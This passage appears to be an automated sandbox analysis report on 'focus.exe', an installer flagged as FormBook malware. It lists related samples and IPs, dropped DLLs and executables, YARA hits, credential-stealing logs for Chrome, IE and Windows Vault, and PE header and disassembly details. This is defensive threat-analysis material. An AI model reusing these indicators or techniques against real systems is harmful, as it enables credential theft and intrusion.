	WaybillDoc_5736357561.pdf.exe	Get hash	malicious	Browse	184.106.54.10
	VWR CI 160421.xlsx.exe	Get hash	malicious	Browse	173.203.187.10
	NdBLyH2h5d.exe	Get hash	malicious	Browse	162.209.114.201
	RFQ12-ADM2020pdf.exe	Get hash	malicious	Browse	23.253.11.194
	f1uK8cmWpt.dll	Get hash	malicious	Browse	209.20.87.138
	JmtlihbjqE.dll	Get hash	malicious	Browse	209.20.87.138
	GMLce4kiLh.dll	Get hash	malicious	Browse	209.20.87.138
	lbL6XqqqM3.dll	Get hash	malicious	Browse	209.20.87.138
	ju3KXnbV9b.dll	Get hash	malicious	Browse	209.20.87.138
	ofBzBALmBi.dll	Get hash	malicious	Browse	209.20.87.138
	executable.2772.exe	Get hash	malicious	Browse	23.253.46.64
	JRTpdf.exe	Get hash	malicious	Browse	184.106.42.192

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll	delZYToJxe.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\DB1 Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\0NN3-705\0NNlogim.jpeg Download File
Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	106124
Entropy (8bit):	7.929012201389515
Encrypted:	false
SSDEEP:	3072:XAaIwYgckzhMWoUXYJvFSVmJuff2DKeKGB4PFl5TC1WgsdU2lG:XFFYHkzhMWzgv8VmJuGDrKBPdldnlG
MD5:	7E803876142895EAB1A3E3ADE118C897
SHA1:	2F98E6DD066EFAE230AA0C8461336E8557A76218
SHA-256:	5545C92F48DA83A824183A492C92BA814355383C4D7526EAFB32840E3AEB41F3
SHA-512:	14E7281844B6958C6D89AADB8618B7E37F9A184A18EF66476A875C112AC8D16B5F563A92A2298843947641CFCB4CC08B6517A903E4BCD6017C84C198152419A4
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.\|..).?.H.'.\|....).?m.....h.t......\|4.%...d....

C:\Users\user\AppData\Roaming\0NN3-705\0NNlogrg.ini Download File
Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Reputation:	high, very likely benign file
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\0NN3-705\0NNlogri.ini Download File
Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Reputation:	high, very likely benign file
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\0NN3-705\0NNlogrv.ini Download File
Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	210
Entropy (8bit):	3.504619219205926
Encrypted:	false
SSDEEP:	6:tGQPYlIaExGNlGcQga3Of9y96GO4GlmFr5sEoY:MlIaExGNYvOI6x4RCY
MD5:	B13CDE0DBE0EB58127F97F55B6456633
SHA1:	8DABEAB2067C685BCE09EA43D2AA3A5CBBBB53AF
SHA-256:	31B5179063BFD2E75CF97B7A1103EB35089F8444F373300B93910D29D6D405DF
SHA-512:	24AA3725D4F45142914580BEC3F5D90EFBD250FF7C29FBD5F880D764F543F7FCE081AC3FA5FB469AAFBEA604194CE9B39B796F6BE7BE67F0EF32E91E4E68E5D3
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.p.q.n.p.i.b.a.m.o.j.d.i.x.r.....A.u.t.:.......P.a.s.s.:.......

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	88576
Entropy (8bit):	7.860927979329831
Encrypted:	false
SSDEEP:	1536:V/ZK03F4yJtmCR1T1lBRhHdT0oUtbMeQT410/QMe6bdtrRtD:V/owCy623lBRhHdT0fpMeS41kxtd5
MD5:	74F5780527A0CDF9D079648DADE4956C
SHA1:	2913F03BD371350B0F694E6DCEE8C7DBF1C7A6AB
SHA-256:	A1705F7563F39B2F1A3A5AFDFEA8C2BAF2419EEE53B202F22589C85AF07ACD23
SHA-512:	82E07443C58D0F9A9F8AD8BD45643FDB85C32E3AEC9DB4A3FA3BA11E6F6E36A0BD1E7E1B63E0901DF76A4427C16744B7E692E2B2253C9E79EE6DC6871F648EF5
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........J.Qe$.Qe$.Qe$..my.Re$.Qe%..e$.BmM.Se$.Ti+.Je$.Ti{.8e$.TiD.ve$.Qe$.We$.Tix.Pe$..nz.Pe$.Ti~.Pe$.RichQe$.........PE..L...v..D...........!.....P.......... ........................................ ..........................................h...4...`.......4...........................................................................................................UPX0....................................UPX1.....P.......L..................@....rsrc................P..............@..............................................................................................................................................................................................................................................................................................................................................................................................1.25.UPX!....

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\ReadMe.txt Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	14211
Entropy (8bit):	5.253839322430561
Encrypted:	false
SSDEEP:	384:/GytFQEuWAUJTN3zLDwm/Fx30pnNbIO6GusyiqE0:eqFQEubUJRUcIuO3uEqv
MD5:	06A5DF751EB0765E69BFB15E12F4C665
SHA1:	7394BF7DF2DDA47BF8D55BFBC880D2A2316054AC
SHA-256:	8B9D97C137459A495936AF47F5140FE75F795728A30E9EC3D8AC9C1CB2E5C65F
SHA-512:	AABD6AA18646192BD49E5343E0129E696B1E003A16E8205FD36AA863BE9C97AADF9AC67BBA96629D21EA5921E89CE6A401E74D9347AA77468F3854DC64E20558
Malicious:	false
Preview:	\|==================================\|..\| Program Name: \| ImgBurn \|..\|==================================\|..\| Author: \| LIGHTNING UK! \|..\|==================================\|....Supported Command Line Switches:....(You can get a basic version of this list via 'ImgBurn.exe /?')..../MODE <PICKER \| READ \| BUILD \| WRITE \| VERIFY \| DISCOVERY>...Used to tell the program which 'Mode' to open up in...../BUILDINPUTMODE <STANDARD \| ADVANCED>...Used to tell the program which 'Build Input Mode' to open up in....Only applies to BUILD mode...../BUILDOUTPUTMODE <DEVICE \| IMAGEFILE>...Used to tell the program which 'Build Output Mode' to open up in....Only applies to BUILD mode...../SRC <Drive Letter \| SCSI Address> \| "<Folder Name>\" \| "<File Name>" \| ALLSECTORS \| <Custom Number Of Sectors>...Used to select the source drive or filename....Drive Letter or SCSI Address applies to READ and VERIFY modes....Folder Name applies to BUILD mode... File Name applies to BUILD and WRITE mode

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	110207
Entropy (8bit):	7.949212262670048
Encrypted:	false
SSDEEP:	3072:/T2x0givE7LLCQv6vRoRJrdEQeX0m9JQfrob:/T2Ogt7ag65kNqjJDb
MD5:	C0B11A7E60F69241DDCB278722AB962F
SHA1:	FF855961EB5ED8779498915BAB3D642044FC9BB1
SHA-256:	A8D979460E970E84EACCE36B8A68AE5F6B9CC0FE16E05A6209B4EAD52B81B021
SHA-512:	CB040ACA6592310BFFB72C898B8EB3CA8A46FF2DF50212634C637593C58683C8AB62E0188DA7AEA362E1B063AE5DB55CF4BF474295922AF0AB94A526465CC472
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: delZYToJxe.exe, Detection: malicious, Browse
Preview:	MZ......................@...................................D.... ..PE..L....0.T...........!.........................p............................................@.............................................@...........................................................................<...H...............................................................@..@.rsrc...............................@..@......... .............................@....................................`..`....................................w.....sSk.......<..^........QF. ..\5...%Go... ....Y..y.Jr..v.Jp...b.."?...`......,..b..ASP ...G...@.(.G&2n.4d~.>z...^&.U..N...(.J......I.DA........`..do...4.c.4{.....]w..h..XD$....`C.5..y-..n3.:....-....s....\2.e.lD.....h......\.,...')+(c.i..=8..H..7u..%,P.<v.Z.a..!....z.C0..F_.i........! . ebc....b.]c.ll..:..?...............6q.1........F.M.I.....X.Ma.wAe.......".1.a..`..`C.dNQ.de.B~GN..p......q`.`H....@.Hm....(.o0n{.5.V.^.N...T....],....ap#...9...G.C.j...s

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\changelog.txt Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	42098
Entropy (8bit):	4.870180237729132
Encrypted:	false
SSDEEP:	768:Qcl6h7Ew8IOIA3EMEU1eRT9h5j+vHWrwNgBb:QC6dEwExHGh+NN4b
MD5:	2BED3AF03E707826F71AB5B92BCFB2B0
SHA1:	F5FF391D5E12B27A1FBE7CBEEAFF780C76560B12
SHA-256:	BEEC18BD021ABDE53C6D3504F427232BFCE2BD4804068E96E59EF45BFC75955C
SHA-512:	753878D1856D22B845A91D7838C2E50DA46153FC76CD262ADB3123C2A4A247CFF569FA014324707BC8C8869516FFCDEE13394FBFB4E438E5E5D207C3EB0C6E19
Malicious:	false
Preview:	Trout..Copyright (c) 2008-2015 Jody Holmes (Skwire Empire)..http://skwire.dcmembers.com/fp/?page=trout....+ added..* changed..- deleted..! bug fixed....v1.0.6 build 76 - 2015-08-11.. + Added an "Autoplay on add" feature under Tools > Options > General... (Thanks, mouser).. * Updated BASS and all plugins... ! Fixed some parsing issues with displayed lyrics.....v1.0.6 build 71 - 2013-11-02.. ! "Open file location" didn't work properly if the filename contained.. certain characters. (Thanks, app103)....v1.0.6 build 67 - 2013-06-13.. * Non-contiguous listview selections are now movable with the Ctrl+Up and.. Ctrl+Down hotkeys.....v1.0.6 build 67 - 2013-02-02.. + Added playback support for the Opus audio codec. Tags are not supported.. at this time.....v1.0.6 build 63 - 2012-06-16.. * Shortened filepath displayed in the statusbar to 64 characters... (Thanks, AEN007)....v1.0.6 build 62 - 2012-04-26.. ! Launching the Find Track dialog twice

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\config.ini Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	893
Entropy (8bit):	5.038943515858497
Encrypted:	false
SSDEEP:	12:ZvFupF+j2w9dYoJiey6gfzKN9wtNKVJXL4+UDYzMWnO5069pO+Y6:epcj7+oJTg7K3wzKVxUD0O5069pOS
MD5:	3B801C600EFE11FB785C5FCB4EEDC5B4
SHA1:	D6AEA5576C5339EB5FE97853FCE2D8E0CC7FB225
SHA-256:	14F6E1C5335897F4796A0756CC40DC1FC992D8FB54ADCC052ADDB1A56BAF77CD
SHA-512:	EDEF6D1904D48B95E5D41D0188EE6CE8E026662AFA8B0161C29BD880F05B5CF0A030FF048DDEBC73B6BDE35B89EA4E07FD62F3A273DABEAF91417589269CE252
Malicious:	false
Preview:	[Columns]..View_Col_#=1..View_Col_Artist=1..View_Col_Album=1..View_Col_Title=1..View_Col_Year=1..View_Col_Genre=1..View_Col_Time=1..View_Col_Bitrate=1..View_Col_Size=1..View_Col_Ext=1..View_Col_Path=1..View_Col_Filename=1..View_Col_Composer=1..View_Col_Comment=1..View_Col_Sample=1..View_Col_Channels=1..View_Col_ModDate=1..Width_Col_#=25..Width_Col_Artist=35..Width_Col_Album=41..Width_Col_Title=32..Width_Col_Year=34..Width_Col_Genre=41..Width_Col_Time=35..Width_Col_Bitrate=42..Width_Col_Size=32..Width_Col_Ext=27..Width_Col_Path=34..Width_Col_Filename=54..Width_Col_Composer=59..Width_Col_Comment=56..Width_Col_Sample=47..Width_Col_Channels=56..Width_Col_ModDate=56..Column_Order=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19..[Settings]..Play_Mode=1..LastFM_Enable=0..LibreFM_Enable=0..Vol_Level=25..Remember_Playback_Data=0\|0\|0..[Position]..pos_x=200..pos_y=200..pos_w=978..pos_h=490..

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PDF document, version 1.7
Category:	dropped
Size (bytes):	388398
Entropy (8bit):	7.7678320111132155
Encrypted:	false
SSDEEP:	6144:EetS46Debi2aV+0/1uF9XCq0PMqv7PDM+gLXs6CsGt5Bp8A5:Z6D0I00/YQq0tvk+gA6C1pf5
MD5:	1CE793BAE7FC355DB78B184804C820E1
SHA1:	6D2D31555A644CC8867D6E196A28F044C355D5FE
SHA-256:	80D27DD800D9561D4AF96998302CB101D201A150B801788B68CD9683C83686E7
SHA-512:	0FAE4272E71A95A1042179C27F014A4FA17AAFF9F0828A37830D4CD1FFAC6AEC8DC1B0C0A6E7FB852D0D746498DCCBD9B656D169405B3B67DFEEFD484565E052
Malicious:	true
Yara Hits:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, Author: JPCERT/CC Incident Response Group
Preview:	%PDF-1.7..%......1 0 obj..<</Pages 2 0 R /Type/Catalog/MarkInfo<</Marked false>>/Lang(fr-FR)/Metadata 46 0 R >>..endobj..2 0 obj..<</Type/Pages/Kids[ 3 0 R 28 0 R ]/Count 2>>..endobj..3 0 obj.<</Type/Page/StructParents 0/Resources<</XObject<</Image27 27 0 R/Image20 20 0 R/Image22 22 0 R/Image24 24 0 R/Image25 25 0 R/Image26 26 0 R>>/ExtGState<</FXE1 47 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]/Font<</F6 18 0 R/F1 5 0 R/F2 7 0 R/F3 9 0 R/F4 11 0 R/F5 13 0 R>>>>/MediaBox[0 0 612 792]/Parent 2 0 R/Contents 4 0 R/Tabs/S/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>>>.endobj.4 0 obj.<</Length 4741/Filter/FlateDecode>>.stream.x..][s...g..<m.S6L.x.:U..$......3..I;...T......H..,{.."U.%^.F......{......\|......lR/O~...........OG).....R.M.n..O....}..=...O.L.O.=YpQ.\K^....5....U"...R'f..$.\|K.dm.\....]...'..ze..lrc.cIA-.5l..M...5...OHl.Z.;.1M"..k"..e/...........q...................^..l.....q......U..../WW.fq]...5.{...?....0m...e.'k.E...A..F%.f.4<...B...YS.}.....Kv..

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2042880
Entropy (8bit):	6.989055847012453
Encrypted:	false
SSDEEP:	49152:4fRMS0uOjfcC+lJTWGiGoFPXYIlgxllH:4fRMvjfcCaEGQ1YI6
MD5:	07B1496D3966896513CE831A71780213
SHA1:	58C30ACE7343F00180478F30922196A8A8E89483
SHA-256:	A7C5A7B9BDD19704E4FB41D37D2EE7D81A6B98CA0381DD78F9E63FA354DEF973
SHA-512:	6CCD8B647FC191A9AC991E2BC9E6C819869585C6D4D9B359EB9E91C73BA0E2F3042E31449CE4237E65D4C54DB19D3EC2B1F23E181CB8304AED1FB19AC69FF942
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 21%, Browse Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........a5..f..f..f...g..f...gy..f...g..f...f..f...g..f...g..f...g...f..f..f_..g..f...g..f...g..f..f...f...g..f...g..f...f..f...g..fRich..f........PE..L..."..`...........!.....L...................`............................................@..........................L..t...tL..........(.......................T..../..p....................1.......0..@............`..<............................text....K.......L.................. ..`.rdata.......`.......P..............@..@.data........`...J...J..............@....rsrc...(...........................@..@.reloc..T............F..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1970176
Entropy (8bit):	6.512980477417573
Encrypted:	false
SSDEEP:	24576:IvH6HpXAw2B2KE0gcb8cQiqPB4JYx6XSmFa7tABvKx/LHn5m7PrujGwhgE6WOfCG:Vp//cI/BWtZQxz5mDru6wZ6WO+
MD5:	1844A4E542EEAC121065EA23B0F1D6B3
SHA1:	0271EC1ED951442657321FF59FD28F9735DC09F5
SHA-256:	4A57B47F159289D846BFF4A5529EC69DDFCD57B088E7381CD9F65270A3467E40
SHA-512:	434F7A45FAF6335ECAB160C00188EC6BC9FC6FDD1C65CAE3D582CB011BEB0016CB8912F69F25DB9EE7046627B942FE0F6EEBF5F09102118FF26E41F759CD9E3A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 69%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u..f&..f&..f&.e'..f&.c'y.f&.b'..f&..e'..f&N.b'..f&..b'N.f&..c'..f&..c'..f&.g'..f&..g&..f&..o'..f&...&..f&...&..f&..d'..f&Rich..f&........PE..L....z.`.....................$.......P............@..........................`............@.....................................P........e...................`..0.......p...............................@...............0............................text............................... ....rdata..............................@..@.data...x.... ......................@....rsrc....e.......f..................@..@.reloc..0....`......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\res\no_cover.jpg Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	[TIFF image data, little-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=Paint.NET v3.36], baseline, precision 8, 65x65, frames 3
Category:	dropped
Size (bytes):	2344
Entropy (8bit):	7.446997849728867
Encrypted:	false
SSDEEP:	48:jWuERAqRT8QXUm9Pe69shbRRXXxOsPUO4gvh4ndFdddi:jJEdRTV79shFBBOUrvCE
MD5:	8D9A983AB3416BE1F888755C508AB6D4
SHA1:	65DE098A3923AF833CDCE647E0FC2B64B0817AAB
SHA-256:	4635E9621F649B94C867AA983AA40CA70210224DB01953A0114A586F134653B1
SHA-512:	DE40035D334444C4D6D8BEF6613430335419CDB8B173386DCCFC78455AAA583D1D4F7DF41B62982EB424B1FFD653B28DBB585C479BCC858AF7328E4BC88D841F
Malicious:	false
Preview:	......JFIF.....`.`.....fExif..II...............>...........F...(...........1.......N.......`.......`.......Paint.NET v3.36....C....................................................................C.......................................................................A.A.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......d...2...~=...m..:......~..._..'...:..}.....m..In&.Kb......K31$.k.?...K/.F.......oC...Z?..../........c.........N...,..............h...N...,..............j..........~.......6............/"..j:....Ll.......... .....ZF....y...g-6.U..5.e../....K..k....WS....#.Ut

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\res\streaming_cover.jpg Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 299x279, frames 3
Category:	dropped
Size (bytes):	23123
Entropy (8bit):	7.975513953734144
Encrypted:	false
SSDEEP:	384:qvlUVVUGMDlHL2U6/buO11a0O4kl1W62dkKrKyNSb2RgXuelYH0AOsPC0e5i++l:qdDDDlHLp6DB20O91a3NSb2ou/06PC5c
MD5:	5189FDF08CE5551081D23AD5966E1AEE
SHA1:	9CFA27749EAE4BDF48D572892E51A2E27EB74FAA
SHA-256:	2E2F5B1A459213ED5F368BBD00CB5A642335BEEE2CE56A1C21D4AD25EEE6D393
SHA-512:	E6886D6085EF198EDEC7ADFD4DE6433BD68B1F8A2E0D8247FF136E970FBC034B8B2F4300A018A7F73373594EC84D21A6018D23110D7D7D2F4F17808836E0C7E6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.........................................................................+.."..........................................O.........................."..!2B.1ARb.#Qr.aq.....3...$C...S........4D.%Tc.....................................=.........................!1.A."Qaq..2B......R#3b..4S...r...............?....]..`^h.L(?z..l'..N...o..k.........jr.......s..uCT..g..K.o.......Pw.{)..-)G..0.7j.?4j.~.5.k]..#......._.M..B..Eg...-].P......b......< $..\|...T..5n.MAw5.D`...6..r.%.w4...7j.pG.&.# .s..jAs.V....L.$.H.W.!..5..v...r...4J.a..'.......w.......'...i...?..T,.m......-0..O.C..?z...v#7.~..1...#...t..........s....$... ql5[.EzF4.{.F,.{........uf..m<..,...`e&..F../8...zm.d...9......c.Ww,.4.q].....1..l.)...F..(.D..:...w!v...........4.B.A...0..t..sF<..}.......M.Bl....n.g.).....s.U.4_...6.....AGY.......b........w..?,(NT.agfI..7..i....>....qFh....s...%..@...F.....L...d..g..wD~.-z..eH%.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.957086026055519
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	focus.exe
File size:	2844959
MD5:	5e5cc661beb832b718df6b68d16c0165
SHA1:	af146998a35d9a76b9969b85811d19b2a5cd21a9
SHA256:	bf07af9d0e95551d5599a2c1145adc2fb24595e8451c1340b91969f8577cd212
SHA512:	9fc7dac7483469ef5a22c265948b915282cbf7ce9bf5fb9d6430d83f72f633c93da9d9342cac6fb15530bb21a4233663b1f711511c1e3249aa3c2d6a73f3b391
SSDEEP:	49152:aVEMg20owQaTao3OqijJCc14G5NSDoCw3AkpxEGkgE32f+TbMnO:aSg0owLTL+LJl1/MoCwQaxEGkp2ZO
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...\|......H3............@

File Icon


Icon Hash:	f0e8b0a8b8e8e871

Static PE Info

General
Entrypoint:	0x403348
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ced282d9b261d1462772017fe2f6972b

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B8h]
call dword ptr [004080BCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F42Ch], eax
je 00007F8110DB6DF3h
push ebx
call 00007F8110DB9F56h
cmp eax, ebx
je 00007F8110DB6DE9h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007F8110DB9ED2h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F8110DB6DCDh
push 0000000Bh
call 00007F8110DB9F2Ah
push 00000009h
call 00007F8110DB9F23h
push 00000007h
mov dword ptr [0042F424h], eax
call 00007F8110DB9F17h
cmp eax, ebx
je 00007F8110DB6DF1h
push 0000001Eh
call eax
test eax, eax
je 00007F8110DB6DE9h
or byte ptr [0042F42Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4F8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429850h
call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8544	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x3ebb8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6457	0x6600	False	0.66823682598	data	6.43498570321	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1380	0x1400	False	0.4625	data	5.26100389731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
